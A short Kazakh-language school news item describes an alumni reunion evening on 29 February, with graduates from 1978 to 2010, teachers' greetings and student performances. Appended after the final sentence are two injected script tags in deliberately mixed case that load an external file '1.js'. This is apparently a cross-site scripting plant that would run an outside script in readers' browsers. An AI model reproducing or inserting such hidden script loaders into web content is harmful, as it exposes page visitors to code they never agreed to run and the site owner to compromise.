29 ақпан күні мектеп түлектерімен кездесу кеші өтті. Тарихы тереңде жатқан, бірнеше мыңдаған түлектер ұшырған мектебіміз осы кеште мектеп түлектері мен мұғалімдерін қауыштырды. Мерейтойлы жылғы түлектердің алғашқылары сонау 1978 жылдары, ал соңғылары 2010 жылы мектеп қабырғасын тəмəмдаған екен. Ұстаздар мен түлектер мектептегі өткізген ғажап күндерді еске түсіріп, бір-біріне жылы лебіздерін білдірді. Мектебіміздің ардагер ұстаздары қазіргі мектептің жағдайын көріп, мектеп басшысы мен ұжымға алғыстарын жаудырды. Кеш бағдарламасынан бірде бір мектеп бітірген түлек назардан тыс қалмады. Мектеп мұғалімдері мен оқушылары өз өнерлерімен қонақтарды тəнті етті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>